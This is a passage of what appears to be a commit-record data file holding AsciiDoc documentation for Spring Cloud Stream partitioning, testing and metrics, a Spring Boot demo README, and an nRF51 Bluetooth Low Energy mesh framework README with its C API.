`spring.cloud.stream.instanceIndex` is `0`.\n\nIn a scaled-up scenario, correct configuration of these two properties is important for addressing partitioning behavior (see below) in general, and the two properties are always required by certain binders (for example, the Kafka binder) in order to ensure that data are split correctly across multiple consumer instances.\n\n[[spring-cloud-stream-overview-partitioning]]\n=== Partitioning\n\nPartitioning in Spring Cloud Stream consists of two tasks:\n\n* \"`<<spring-cloud-stream-overview-configuring-output-bindings-partitioning>>`\"\n* \"`<<spring-cloud-stream-overview-configuring-input-bindings-partitioning>>`\"\n\n[[spring-cloud-stream-overview-configuring-output-bindings-partitioning]]\n==== Configuring Output Bindings for Partitioning\n\nYou can configure an output binding to send partitioned data by setting one and only one of its `partitionKeyExpression` or `partitionKeyExtractorName` properties, as well as its `partitionCount` property.\n\nFor example, the following is a valid and typical configuration:\n\n----\nspring.cloud.stream.bindings.output.producer.partitionKeyExpression=payload.id\nspring.cloud.stream.bindings.output.producer.partitionCount=5\n----\n\nBased on that example configuration, data is sent to the target partition by using the following logic.\n\nA partition key's value is calculated for each message sent to a partitioned output channel based on the `partitionKeyExpression`.\nThe `partitionKeyExpression` is a SpEL expression that is evaluated against the outbound message for extracting the partitioning key.\n\nIf a SpEL expression is not sufficient for your needs, you can instead calculate the partition key value by providing an implementation of `org.springframework.cloud.stream.binder.PartitionKeyExtractorStrategy` and configuring it as a bean (by using the `@Bean` annotation).
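\n\nThe following is a minimal sketch of such an implementation (the class matches the bean registration shown in the next example, while the `customerId` header and the key logic are purely illustrative):\n\n[source,java]\n----\nimport org.springframework.cloud.stream.binder.PartitionKeyExtractorStrategy;\nimport org.springframework.messaging.Message;\n\npublic class CustomPartitionKeyExtractorClass implements PartitionKeyExtractorStrategy {\n\n @Override\n public Object extractKey(Message<?> message) {\n \/\/ Any value derived from the outbound message can serve as the key.\n return message.getHeaders().get(\"customerId\");\n }\n}\n----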
\n\nIf you have more than one bean of type `org.springframework.cloud.stream.binder.PartitionKeyExtractorStrategy` available in the Application Context, you can further filter it by specifying its name with the `partitionKeyExtractorName` property, as shown in the following example:\n\n[source]\n----\n--spring.cloud.stream.bindings.output.producer.partitionKeyExtractorName=customPartitionKeyExtractor\n--spring.cloud.stream.bindings.output.producer.partitionCount=5\n. . .\n@Bean\npublic CustomPartitionKeyExtractorClass customPartitionKeyExtractor() {\n return new CustomPartitionKeyExtractorClass();\n}\n----\n\nNOTE: In previous versions of Spring Cloud Stream, you could specify the implementation of `org.springframework.cloud.stream.binder.PartitionKeyExtractorStrategy` by setting the `spring.cloud.stream.bindings.output.producer.partitionKeyExtractorClass` property.\nSince version 2.0, this property is deprecated, and support for it will be removed in a future version.\n\nOnce the message key is calculated, the partition selection process determines the target partition as a value between `0` and `partitionCount - 1`.\nThe default calculation, applicable in most scenarios, is based on the following formula: `key.hashCode() % partitionCount`.\nThis can be customized on the binding, either by setting a SpEL expression to be evaluated against the 'key' (through the `partitionSelectorExpression` property) or by configuring an implementation of `org.springframework.cloud.stream.binder.PartitionSelectorStrategy` as a bean (by using the `@Bean` annotation).\nSimilar to the `PartitionKeyExtractorStrategy`, you can further filter it by using the `spring.cloud.stream.bindings.output.producer.partitionSelectorName` property when more than one bean of this type is available in the Application Context, as shown in the following example:\n\n[source]\n----\n--spring.cloud.stream.bindings.output.producer.partitionSelectorName=customPartitionSelector\n. . .\n@Bean\npublic CustomPartitionSelectorClass customPartitionSelector() {\n return new CustomPartitionSelectorClass();\n}\n----\n\nNOTE: In previous versions of Spring Cloud Stream you could specify the implementation of `org.springframework.cloud.stream.binder.PartitionSelectorStrategy` by setting the `spring.cloud.stream.bindings.output.producer.partitionSelectorClass` property.\nSince version 2.0, this property is deprecated and support for it will be removed in a future version.\n\n[[spring-cloud-stream-overview-configuring-input-bindings-partitioning]]\n==== Configuring Input Bindings for Partitioning\n\nAn input binding (with the channel name `input`) is configured to receive partitioned data by setting its `partitioned` property, as well as the `instanceIndex` and `instanceCount` properties on the application itself, as shown in the following example:\n\n----\nspring.cloud.stream.bindings.input.consumer.partitioned=true\nspring.cloud.stream.instanceIndex=3\nspring.cloud.stream.instanceCount=5\n----\n\nThe `instanceCount` value represents the total number of application instances between which the data should be partitioned.\nThe `instanceIndex` must be a unique value across the multiple instances, with a value between `0` and `instanceCount - 1`.\nThe instance index helps each application instance to identify the unique partition(s) from which it receives data.\nIt is required by binders using technology that does not support partitioning natively.\nFor example, with RabbitMQ, there is a queue for each partition, with the queue name containing the instance index.\nWith Kafka, if `autoRebalanceEnabled` is `true` (default), Kafka takes care of distributing partitions across instances, and these properties are not required.\nIf `autoRebalanceEnabled` is set to `false`, the `instanceCount` and `instanceIndex` are used by the 
binder to determine which partition(s) the instance subscribes to (you must have at least as many partitions as there are instances).\nThe binder allocates the partitions instead of Kafka.\nThis might be useful if you want messages for a particular partition to always go to the same instance.\nWhen a binder configuration requires them, it is important to set both values correctly in order to ensure that all of the data is consumed and that the application instances receive mutually exclusive datasets.\n\nWhile using multiple instances for partitioned data processing may be complex to set up in the standalone case, Spring Cloud Data Flow can simplify the process significantly by populating both the input and output values correctly and by letting you rely on the runtime infrastructure to provide information about the instance index and instance count.\n\n== Testing\n\nSpring Cloud Stream provides support for testing your microservice applications without connecting to a messaging system.\nYou can do that by using the `TestSupportBinder` provided by the `spring-cloud-stream-test-support` library, which can be added as a test dependency to the application, as shown in the following example:\n\n[source,xml]\n----\n <dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-stream-test-support<\/artifactId>\n <scope>test<\/scope>\n <\/dependency>\n----\n\nNOTE: The `TestSupportBinder` uses the Spring Boot autoconfiguration mechanism to supersede the other binders found on the classpath.\nTherefore, when adding a binder as a dependency, you must make sure that the `test` scope is being used.\n\nThe `TestSupportBinder` lets you interact with the bound channels and inspect any messages sent and received by the application.\n\nFor outbound message channels, the `TestSupportBinder` registers a single subscriber and retains the messages emitted by the application in a `MessageCollector`.\nThey can be retrieved during tests and have assertions made against them.\n\nYou can also send messages to inbound message channels so that the consumer application can consume the messages.\nThe following example shows how to test both input and output channels on a processor:\n\n[source,java]\n----\n@RunWith(SpringRunner.class)\n@SpringBootTest(webEnvironment= SpringBootTest.WebEnvironment.RANDOM_PORT)\npublic class ExampleTest {\n\n @Autowired\n private Processor processor;\n\n @Autowired\n private MessageCollector messageCollector;\n\n @Test\n @SuppressWarnings(\"unchecked\")\n public void testWiring() {\n Message<String> message = new GenericMessage<>(\"hello\");\n processor.input().send(message);\n Message<String> received = (Message<String>) messageCollector.forChannel(processor.output()).poll();\n assertThat(received.getPayload(), equalTo(\"hello world\"));\n }\n\n\n @SpringBootApplication\n @EnableBinding(Processor.class)\n public static class MyProcessor {\n\n @Autowired\n private Processor channels;\n\n @Transformer(inputChannel = Processor.INPUT, outputChannel = Processor.OUTPUT)\n public String transform(String in) {\n return in + \" world\";\n }\n }\n}\n----\n\nIn the preceding example, we create an application that has an input channel and an output channel, both bound through the `Processor` interface.\nThe bound interface is injected into the test so that we can have access to both channels.\nWe send a message on the input channel, and we use the `MessageCollector` provided by Spring Cloud Stream's test support to capture that the message has been sent 
to the output channel as a result.\nOnce we have received the message, we can validate that the component functions correctly.\n\n=== Disabling the Test Binder Autoconfiguration\n\nThe intent behind the test binder superseding all the other binders on the classpath is to make it easy to test your applications without making changes to your production dependencies.\nIn some cases (for example, integration tests) it is useful to use the actual production binders instead, and that requires disabling the test binder autoconfiguration.\nTo do so, you can exclude the `org.springframework.cloud.stream.test.binder.TestSupportBinderAutoConfiguration` class by using one of the Spring Boot autoconfiguration exclusion mechanisms, as shown in the following example:\n\n[source,java]\n----\n @SpringBootApplication(exclude = TestSupportBinderAutoConfiguration.class)\n @EnableBinding(Processor.class)\n public static class MyProcessor {\n\n @Transformer(inputChannel = Processor.INPUT, outputChannel = Processor.OUTPUT)\n public String transform(String in) {\n return in + \" world\";\n }\n }\n----\n\nWhen autoconfiguration is disabled, the test binder is available on the classpath, and its `defaultCandidate` property is set to `false` so that it does not interfere with the regular user configuration. It can be referenced under the name `test`, as shown in the following example:\n\n`spring.cloud.stream.defaultBinder=test`\n\n== Health Indicator\n\nSpring Cloud Stream provides a health indicator for binders.\nIt is registered under the name `binders` and can be enabled or disabled by setting the `management.health.binders.enabled` property.\n\nTo enable the health check, you first need to enable both \"web\" and \"actuator\" by including their dependencies (see <<spring-cloud-stream-preface-actuator-web-dependencies>>).\n\nIf `management.health.binders.enabled` is not set explicitly by the application, then `management.health.defaults.enabled` is matched as `true` and the binder health indicators are enabled.\nIf you want to disable the health indicator completely, you have to set `management.health.binders.enabled` to `false`.\n\nYou can use the Spring Boot Actuator health endpoint to access the health indicator: `\/actuator\/health`.\nBy default, you only receive the top-level application status when you hit this endpoint.\nIn order to receive the full details from the binder-specific health indicators, you need to include the property `management.endpoint.health.show-details` with the value `ALWAYS` in your application.\n\nHealth indicators are binder-specific, and certain binder implementations may not necessarily provide a health indicator.\n\nIf you want to completely disable all health indicators available out of the box and instead provide your own health indicators, you can do so by setting the `management.health.binders.enabled` property to `false` and then providing your own `HealthIndicator` beans in your application.\nIn this case, the health indicator infrastructure from Spring Boot still picks up these custom beans.\nEven if you are not disabling the binder health indicators, you can still enhance the health checks by providing your own `HealthIndicator` beans in addition to the out of the box health checks.
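\n\nAs a rough sketch, such a custom indicator is a regular Spring Boot `HealthIndicator` bean (the bean name and the placeholder connectivity check below are illustrative only):\n\n[source,java]\n----\nimport org.springframework.boot.actuate.health.Health;\nimport org.springframework.boot.actuate.health.HealthIndicator;\nimport org.springframework.context.annotation.Bean;\n\n@Bean\npublic HealthIndicator customBinderHealthIndicator() {\n return () -> {\n \/\/ Replace this placeholder with a real connectivity check.\n boolean brokerReachable = true;\n return brokerReachable ? Health.up().build() : Health.down().build();\n };\n}\n----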
\n\nWhen you have multiple binders in the same application, health indicators are enabled by default unless the application turns them off by setting `management.health.binders.enabled` to `false`.\nIn this case, if you want to disable the health check for a subset of the binders, set `management.health.binders.enabled` to `false` in the multi-binder configuration's environment.\nSee <<multiple-systems,Connecting to Multiple Systems>> for details on how environment-specific properties can be provided.\n\n\n[[spring-cloud-stream-overview-metrics-emitter]]\n== Metrics Emitter\n\nSpring Boot Actuator provides dependency management and auto-configuration for https:\/\/micrometer.io\/[Micrometer], an application metrics\nfacade that supports numerous https:\/\/docs.spring.io\/spring-boot\/docs\/2.0.0.RELEASE\/reference\/htmlsingle\/#production-ready-metrics[monitoring systems].\n\nSpring Cloud Stream provides support for emitting any available Micrometer-based metrics to a binding destination, allowing for periodic\ncollection of metric data from stream applications without relying on polling individual endpoints.\n\nMetrics Emitter is activated by defining the `spring.cloud.stream.bindings.applicationMetrics.destination` property,\nwhich specifies the name of the binding destination used by the current binder to publish metric messages.\n\nFor example:\n[source]\n----\nspring.cloud.stream.bindings.applicationMetrics.destination=myMetricDestination\n----\nThe preceding example instructs the binder to bind to `myMetricDestination` (that is, a Rabbit exchange, a Kafka topic, and so on).\n\nThe following properties can be used for customizing the emission of metrics:\n\nspring.cloud.stream.metrics.key::\nThe name of the metric being emitted. Should be a unique value per application.\n+\nDefault: `${spring.application.name:${vcap.application.name:${spring.config.name:application}}}`\n+\nspring.cloud.stream.metrics.properties::\nAllows whitelisting application properties that are added to the metrics payload.\n+\nDefault: null.\n+\nspring.cloud.stream.metrics.meter-filter::\nPattern to control the 'meters' one wants to capture.\nFor example, specifying `spring.integration.*` captures metric information for meters whose name starts with `spring.integration.`\n+\nDefault: all 'meters' are captured.\n+\nspring.cloud.stream.metrics.schedule-interval::\nInterval to control the rate of publishing metric data.\n+\nDefault: 1 min\n\nConsider the following:\n\n[source,bash]\n----\njava -jar time-source.jar \\\n --spring.cloud.stream.bindings.applicationMetrics.destination=someMetrics \\\n --spring.cloud.stream.metrics.properties=spring.application** \\\n --spring.cloud.stream.metrics.meter-filter=spring.integration.*\n----\n\nThe following example shows the payload of the data published to the binding destination as a result of the preceding command:\n\n[source,javascript]\n----\n{\n\t\"name\": \"application\",\n\t\"createdTime\": \"2018-03-23T14:48:12.700Z\",\n\t\"properties\": {\n\t},\n\t\"metrics\": [\n\t\t{\n\t\t\t\"id\": {\n\t\t\t\t\"name\": \"spring.integration.send\",\n\t\t\t\t\"tags\": [\n\t\t\t\t\t{\n\t\t\t\t\t\t\"key\": \"exception\",\n\t\t\t\t\t\t\"value\": \"none\"\n\t\t\t\t\t},\n\t\t\t\t\t{\n\t\t\t\t\t\t\"key\": \"name\",\n\t\t\t\t\t\t\"value\": \"input\"\n\t\t\t\t\t},\n\t\t\t\t\t{\n\t\t\t\t\t\t\"key\": \"result\",\n\t\t\t\t\t\t\"value\": \"success\"\n\t\t\t\t\t},\n\t\t\t\t\t{\n\t\t\t\t\t\t\"key\": \"type\",\n\t\t\t\t\t\t\"value\": \"channel\"\n\t\t\t\t\t}\n\t\t\t\t],\n\t\t\t\t\"type\": \"TIMER\",\n\t\t\t\t\"description\": \"Send processing time\",\n\t\t\t\t\"baseUnit\": \"milliseconds\"\n\t\t\t},\n\t\t\t\"timestamp\": \"2018-03-23T14:48:12.697Z\",\n\t\t\t\"sum\": 130.340546,\n\t\t\t\"count\": 6,\n\t\t\t\"mean\": 
21.72342433333333,\n\t\t\t\"upper\": 116.176299,\n\t\t\t\"total\": 130.340546\n\t\t}\n\t]\n}\n----\n\nNOTE: Given that the format of the Metric message changed slightly after migrating to Micrometer, the published message also has\na `STREAM_CLOUD_STREAM_VERSION` header set to `2.x` to help distinguish Metric messages from those sent by older versions of Spring Cloud Stream.\n\n== Samples\n\nFor Spring Cloud Stream samples, see the https:\/\/github.com\/spring-cloud\/spring-cloud-stream-samples[spring-cloud-stream-samples] repository on GitHub.\n\n=== Deploying Stream Applications on CloudFoundry\n\nOn CloudFoundry, services are usually exposed through a special environment variable called https:\/\/docs.cloudfoundry.org\/devguide\/deploy-apps\/environment-variable.html#VCAP-SERVICES[VCAP_SERVICES].\n\nWhen configuring your binder connections, you can use the values from an environment variable as explained on the http:\/\/docs.spring.io\/spring-cloud-dataflow-server-cloudfoundry\/docs\/current-SNAPSHOT\/reference\/htmlsingle\/#getting-started-ups[dataflow Cloud Foundry Server] docs.\",\"returncode\":0,\"stderr\":\"\",\"license\":\"apache-2.0\",\"lang\":\"AsciiDoc\"} {\"commit\":\"b1ab6a8fb19e01606802d8b786fe8c7eba9ce316\",\"subject\":\"doc: fixed typo in readme\",\"message\":\"doc: fixed typo in readme\n\",\"repos\":\"toedter\/microservice-60min,toedter\/microservice-60min,toedter\/microservice-60min,toedter\/microservice-60min,toedter\/microservice-60min\",\"old_file\":\"README.adoc\",\"new_file\":\"README.adoc\",\"new_contents\":\"image:https:\/\/travis-ci.org\/toedter\/microservice-60min.svg?branch=master[Build Status, link=\"https:\/\/travis-ci.org\/toedter\/microservice-60min\"]\nimage:http:\/\/img.shields.io\/badge\/license-MIT-blue.svg[\"MIT\", link=\"http:\/\/toedter.mit-license.org\"]\n\n\n= A Microservice in 60 Minutes\n\nThis is the source code for my conference sessions about creating and deploying\na microservice with Spring Boot, Angular and Docker.\n\n== Getting Started\n\n* Make sure Java 8 JDK is installed\n* Open a terminal and invoke \".\/gradlew build bootrun\" (just \"gradlew\" under Windows)\n* Open a Web browser at http:\/\/localhost:8080\n\n== Travis CI\nYou can browse the latest Travis CI build at https:\/\/travis-ci.org\/toedter\/microservice-60min\n\n== Heroku\n\nTravis CI deploys the resulting Docker container to Heroku,\nyou find the latest version running at\nhttps:\/\/microservice-60min.herokuapp.com\n\n== REST API\nYou can browse the REST API with the HAL-Explorer at\nhttps:\/\/microservice-60min.herokuapp.com\/webjars\/hal-explorer\/0.9.5\/index.html#theme=Cosmo&url=\/api\/\n\n\n\",\"old_contents\":\"image:https:\/\/travis-ci.org\/toedter\/microservice-60min.svg?branch=master[Build Status, link=\"https:\/\/travis-ci.org\/toedter\/microservice-60min\"]\nimage:http:\/\/img.shields.io\/badge\/license-MIT-blue.svg[\"MIT\", link=\"http:\/\/toedter.mit-license.org\"]\n\n\n= A Microservice in 60 Minutes\n\nThis is the source code for my conference sessions about creating and deploying\na microservice with Spring Boot, Angular and Docker.\n\n== Getting Started\n\n* Make sure Java 8 JDK is installed\n* Open a terminal and invoke \".\/gradlew build bootrun\" (just \"gradlew\" under Windows)\n* Open a Web browser at http:\/\/localhost:8080\n\n== Travis CI\nYou can browse th latest Travis CI build at https:\/\/travis-ci.org\/toedter\/microservice-60min\n\n== Heroku\n\nTravis CI deploys the resulting Docker container to Heroku,\nyou find the latest version running 
at\nhttps:\/\/microservice-60min.herokuapp.com\n\n== REST API\nYou can browse the REST API with the HAL-Explorer at\nhttps:\/\/microservice-60min.herokuapp.com\/webjars\/hal-explorer\/0.9.5\/index.html#theme=Cosmo&url=\/api\/\n\n\n\",\"returncode\":0,\"stderr\":\"\",\"license\":\"mit\",\"lang\":\"AsciiDoc\"} {\"commit\":\"25516d6a82d258328d5b54df2fa81540663eb882\",\"subject\":\"README: clarification about role in master thesis\",\"message\":\"README: clarification about role in master thesis\",\"repos\":\"ihassin\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh,ihassin\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh\",\"old_file\":\"README.adoc\",\"new_file\":\"README.adoc\",\"new_contents\":\"= nRF51-ble-broadcast-mesh\n\nBluetooth Low Energy based Rebroadcasting mesh implementation on the nRF51.\nWorks with Softdevice S110 v7.x with Timeslot API.\nOffers an API for implementing your own mesh enabled application, operating\nconcurrently with regular BLE applications.\n\n== Usage\nIn addition to two provided examples, there is a template project under\n_examples\/_. This may be used as a basis for your own applications, or you\ncould choose to do it yourself from scratch. In theory, the framework should be\ncompatible with most Softdevice based projects, but some restrictions to\nhardware and software modules apply; see <<resource-allocation>> for details.\nThe framework adds a Mesh GATT service to the Softdevice GATT server which\ncontains all mesh-global states. This service may be accessed by external nodes,\njust as any other GATT service, through a connection established via the\nSoftdevice. See section <<gatt-service>> for details about structure and\naccess. \n\n== Basic concepts\n\nA rebroadcasting mesh network works by flooding all messages to all nodes \nin the network through broadcasts. Each time a device receives a broadcast\nmessage from some other device in the mesh, it repeats the message, or \n_rebroadcasts_ it, letting its neighbors hear the new message. \nThe neighbors rebroadcast the message to their neighbors, and the process\nis repeated until all devices in the mesh have received the message. This \nlets wireless devices talk to each other without being within direct radio \nrange, as devices between them help relay the messages.\n\nThe Rebroadcasting Mesh framework (hereafter referred to as \"the framework\" or\nrbc_mesh) provides a connection-less, rebroadcasting infrastructure for\nsynchronizing states across a set of BLE enabled nodes. All nodes receive all\nmessages that are transmitted within their range, and any node may update the\nmesh-global states. There is no hierarchy, and no directed data links. \n\nThe framework resides on top of the nRF51 Softdevice, utilizing the Timeslot\nAPI to allocate radio time. The framework will attempt to allocate as much time\nas possible, in order to listen for other nodes' messages.\n\nAll nodes in the mesh share a set of indexed dataslots. The data contained at each\nindex is propagated through the mesh with version numbers, with the objective of \nsynchronizing the same version of the data across all nodes in the mesh. Each \ntime a node overwrites a value, it increments the version number, and all nodes \nthat receive a broadcast message with a version number that is higher than the \none in its database will adapt this new version of the value.
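\n\nIn pseudo-C, this adopt-if-newer rule amounts to the following sketch (the struct fields and names here are purely illustrative, not part of the framework API):\n\n[source,c]\n----\n\/* Illustrative only: adopt a received value if its version is newer. *\/\nif (incoming->version > local->version)\n{\n memcpy(local->data, incoming->data, incoming->length);\n local->version = incoming->version;\n \/* ...and notify the application about the update. *\/\n}\n----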
\n\nThe value propagation is controlled by an implementation of the IETF RFC6206\n\"Trickle\", a flood control algorithm for lossy, low-power networks. The Trickle\nalgorithm dynamically decides intervals at which a value will be broadcasted by\na node, based on how many consistent messages the node picks up, and when the last\nupdate to the state it manages was. The Trickle algorithm dynamically adapts to\nnode density and value update frequency.\n\nThe framework provides each handle-value pair with one Trickle-instance (an\nisolated version of the algorithm), and utilizes the Softdevice GATT server\nstructure to store the values. All values are stored as characteristics within\none \"Mesh\"-GATT Service, which is accessible to external nodes through a\nclassic BLE Softdevice connection, implemented in application space. The \"BLE\nGateway example\" displays a way to achieve such behavior.\n\n== Structure\nThe project is split into two parts: _rbc_mesh\/_ (the framework), and a folder with\nexamples. The framework is interfaced through a set of API functions,\nexclusively contained in the _rbc_mesh.h_ file. \n\nimage::docs\/architecture.png[Framework modules]\n\n=== Framework Modules\nThe framework is split into several separate modules, each of which is\nresponsible for managing various aspects of the framework.\n\n* *rbc_mesh* The top module of the framework, contains all API functions and is\nthe only module that should be accessed by the application.\n\n* *mesh_srv* The value storage module, communicates with the Softdevice's GATT\nserver, and maps all handles to GATT characteristics.\n\n* *timeslot_handler* A module communicating with and abstracting the nRF51\nSoftdevice Timeslot API and manages the two interrupt contexts the framework\nruns in.\n\n* *trickle* Implementation of the IETF RFC6206 \"Trickle\" algorithm for\nmesh-global state propagation.\n\n* *transport_control* Lower level packet handler. Abstracts the radio interface and\npacket format for the mesh_srv-module. \n\n* *radio_control* Asynchronous radio abstraction. Offers a way for higher level\nmodules to queue radio events and packets, and also provides callbacks on\nvarious radio events.\n\n* *timer_control* Interfaces the NRF_TIMER0 hardware module by managing timer\ncapture allocations and callbacks. Tightly integrated with the radio module.\n\n=== API\n\nThe API is exclusively contained in the _rbc_mesh.h_ file in _rbc_mesh\/_, and\nwhile the other framework files need to be included in the build process or\nKeil project, they should not be interfaced directly. Note that all API\nfunctions except the getters for metadata call Softdevice SVC functions, and\nconsequently, all use of the API must happen in interrupt context APP_LOW or MAIN. \nThe framework event callback function runs in priority 3 (APP_LOW), and it is\nsafe to use the API from this context.\n\n==== The API provides the following functions to the user:\n\n*Initialize framework*\n[source,c]\n----\nuint32_t rbc_mesh_init(uint32_t access_addr, \n uint8_t channel, \n uint8_t handle_count, \n uint8_t adv_int_ms); \n----\nThis function must be called before any other framework function, and sets up\nthe Mesh GATT service and enables listening for incoming mesh messages.\n\nAll nodes within the same mesh network must be set up with the same access\naddress and channel, but handle_count and adv_int_ms may be different.
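\n\nFor example, a node could be initialized as follows (the access address, channel, handle count and interval are arbitrary example values, and `APP_ERROR_CHECK` is assumed to be the standard nRF51 SDK error macro):\n\n[source,c]\n----\n\/* Example values only: all nodes in the same mesh must use the same\n access address and channel. *\/\nuint32_t error_code = rbc_mesh_init(0xA541A68F, 38, 2, 100);\nAPP_ERROR_CHECK(error_code);\n----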
\n\n'''\n\n*Manually enable broadcasting of a given value*\n[source,c]\n----\nuint32_t rbc_mesh_value_enable(uint8_t handle);\n----\nStart broadcasting the indicated value to other nodes, without updating the\ncontents of the value. If the handle-value pair has never been used before, the\nframework forces the node to broadcast an empty version 0-message to\nother nodes, which, in turn will answer with their version of the\nhandle-value-pair. This way, new nodes may get up to date with the rest of the\nnodes in the mesh.\n\n'''\n\n*Disable broadcasting of a given value*\n[source,c]\n----\nuint32_t rbc_mesh_value_disable(uint8_t handle);\n----\nStop broadcasting the indicated handle-value pair. Note that the framework will\nkeep updating the local version of the variable when external nodes write to\nit, and consequently notify the application about the update as usual. The\nframework will not, however, rebroadcast the value to other nodes, but rather\ntake a passive role in the mesh for this handle-value pair.\n\n'''\n\n*Update value*\n[source,c]\n----\nuint32_t rbc_mesh_value_set(uint8_t handle, uint8_t* data, uint16_t len);\n----\nUpdate the value represented by the given handle. This will bump the version\nnumber on the handle-value pair, and broadcast this new version to the rest of\nthe nodes in the mesh. \n\nThe `data` array may at most be 28 bytes long, and an error will be returned if\nthe len parameter exceeds this limitation.\n\n'''\n\n*Get value*\n[source,c]\n----\nuint32_t rbc_mesh_value_get(uint8_t handle, \n uint8_t* data, \n uint16_t* len,\n ble_gap_addr_t* origin_addr);\n----\nReturns the most recent value paired with this handle. The `data` buffer must\nbe at least 28 bytes long in order to ensure memory safe behavior. The actual\nlength of the data is returned in the `length` parameter. The `origin_addr`\nparameter returns the address of the node that first started broadcasting the\ncurrent version of the message.\n\n'''\n\n*Get operational access address*\n[source,c]\n----\nuint32_t rbc_mesh_access_address_get(uint32_t* access_address);\n----\nReturns the access address specified in the initialization function in the\n`access_address` parameter.\n\n'''\n\n*Get operational channel*\n[source,c]\n----\nuint32_t rbc_mesh_channel_get(uint8_t* channel);\n----\nReturns the channel specified in the initialization function in the\n`channel` parameter.\n\n'''\n\n*Get handle count*\n[source,c]\n----\nuint32_t rbc_mesh_handle_count_get(uint8_t* handle_count);\n----\nReturns the handle count specified in the initialization function in the\n`handle_count` parameter. \n\n'''\n\n*Get minimum advertisement interval*\n[source,c]\n----\nuint32_t rbc_mesh_adv_int_get(uint32_t* adv_int_ms);\n----\nReturns the minimum advertisement interval specified in the initialization\nfunction in the `adv_int_ms` parameter. \n\n'''\n\n*BLE event handler*\n[source,c]\n----\nuint32_t rbc_mesh_ble_evt_handler(ble_evt_t* evt);\n----\nSoftdevice BLE event handler. Must be called by the application if the\nsoftdevice function `sd_ble_evt_get()` returns a new event. This will update\nversion numbers and transmit data if any of the value-characteristics in the\nmesh service has been written to through an external softdevice connection. 
May\nbe omitted if the application never uses any external connections through the\nsoftdevice.\n\n'''\n\n*Softdevice event handler*\n[source,c]\n----\nuint32_t rbc_mesh_sd_irq_handler(void);\n----\nHandles and consumes any pure softdevice events (excluding softdevice BLE\n events. See the official\n https:\/\/devzone.nordicsemi.com\/docs\/[Softdevice documentation] for\n details). Should be called on each call to `SD_IRQHandler()`.\n\n==== Return values\nAll API functions return a 32-bit status code, as defined by the nRF51 SDK. All \nfunctions will return `NRF_SUCCESS` upon successful completion, and all\nfunctions except the `rbc_mesh_init()` function return\n`NRF_ERROR_INVALID_STATE` if the framework has not been initialized. All\npossible return codes for the individual API functions (and their meaning)\nare defined in the `rbc_mesh.h` file. \n\n==== Framework events\nIn addition to the provided API functions, the framework provides an event\nqueue for the application. These events are generated in the framework and\nshould be handled by the application in an implementation of the\n`rbc_mesh_event_handler()` function defined in _rbc_mesh.h_. The events come in\nthe shape of `rbc_mesh_event_t*` structs, with an event type, a handle number,\na data array and an originator address.\n\nThe framework may produce the following events:\n\n* *Update*: The value addressed by the given handle has been updated from an\nexternal node with the given address, and now contains the data array\nprovided in the event-structure.\n\n* *Conflicting*: A value with the same version number, but different data or\noriginator has arrived at the node, and this new, conflicting value is provided\nwithin the event-structure. The value is *not* overwritten in the database, but\nthe application is free to do this with a call to `rbc_mesh_value_set()`.\n\n* *New*: The node has received an update to the indicated handle-value pair,\nwhich was not previously active.
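\n\nA minimal handler for these events could look like the following sketch (the enumerator and field names are illustrative; see _rbc_mesh.h_ for the actual definitions):\n\n[source,c]\n----\nvoid rbc_mesh_event_handler(rbc_mesh_event_t* evt)\n{\n switch (evt->event_type)\n {\n case RBC_MESH_EVENT_TYPE_NEW_VAL:\n case RBC_MESH_EVENT_TYPE_UPDATE_VAL:\n \/* React to the new data for the given handle here. *\/\n break;\n case RBC_MESH_EVENT_TYPE_CONFLICTING_VAL:\n \/* Optionally resolve the conflict with rbc_mesh_value_set(). *\/\n break;\n }\n}\n----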
\n\n=== Examples\n\nThe project contains two simple examples and one template project. The two\nexamples are designed to operate together, and show off an extremely simple\nexample scenario where two handle-value pairs decide the state of the two LEDs\non the nRF51 evkit (or red and green LED on the nRF51 dongle). The examples\nhave been tested with boards PCA10000, PCA10001, PCA10031 and PCA10003.\n\nThe template provides a basis for implementing your own applications with the\nframework, and addresses the different event handlers and initialization\nfunctions, without any additional functionality.\n\n==== LED Mesh example\nThis example reads the buttons on the nRF51 evkit boards, and sets the LEDs\naccordingly. It also broadcasts the state of the LEDs to the other nodes in the\nsame mesh, which will copy the state of the node that registered a button push.\nThis example can also be flashed to the nRF51 dongles (PCA10000 and PCA10031), \neven though these boards don't have any GPIO actions enabled. The dongle-nodes \nwill act as active slaves, copying and rebroadcasting the LED states of other \nnodes.\n\n==== BLE Gateway example\nThis example uses the same configuration for LEDs as the LED Mesh example, but\nprovides an S110 Softdevice profile for communication with external nodes instead of a physical interface. The example application starts sending\nregular connectable BLE advertisements with the Softdevice, and displays the\nMesh service in its GATT server, so that external nodes may write to the two\nLED config values as if they were regular characteristics. \n\n== How it works\n=== GATT Service\nAll values are stored as separate characteristics in the Softdevice GATT server. These\ncharacteristics are all contained within one \"Mesh\" GATT service, along with\none metadata characteristic containing information about the state of the mesh.\n\nThe GATT service and characteristics operate with their own 128-bit base UUID,\nwith the same base. \n\n.Assigned UUIDs\n|===\n|Value | UUID \n\n|Mesh service | 0x2A1E0001-FD51-D882-8BA8-B98C0000CD1E\n|Mesh metadata characteristic | 0x2A1E0002-FD51-D882-8BA8-B98C0000CD1E\n|Mesh value characteristic | 0x2A1E0003-FD51-D882-8BA8-B98C0000CD1E\n|===\n\n==== Mesh values\nThe Mesh value characteristics are the states that will be shared across the\nmesh. Each Mesh value may contain up to 28 bytes of data, and be updated from any\nnode in the mesh. \n\nThere may be up to 155 \"Mesh value\" characteristics in the mesh service in each\nnode, depending on configuration parameters provided to the `rbc_mesh_init()`\nfunction at runtime. Each mesh value operates with its own instance of\nthe Trickle algorithm, meaning that each value is rebroadcasted independently.\nThe handles addressing the values are stored as standard https:\/\/developer.bluetooth.org\/gatt\/Pages\/GattNamespaceDescriptors.aspx[Bluetooth SIG\nnamespace descriptors], where the enumeration of each value is used as\na mesh-global handle.\n\n_NOTE:_ Because the Bluetooth SIG has defined namespace descriptor 0 as\n\"unknown\", the handles start at 1, and trying to access handle 0 returns an\nNRF_ERROR_INVALID_ADDR error.\n\n==== Mesh metadata\nFor ease of use, the service also provides a Metadata characteristic, providing\nconfiguration parameters for the mesh. This metadata characteristic may be\nread by external nodes, and used for configuring new nodes that the user wishes\nto add to the mesh. The Metadata characteristic is structured as follows:\n\n[cols=\"3,1,1,6\", 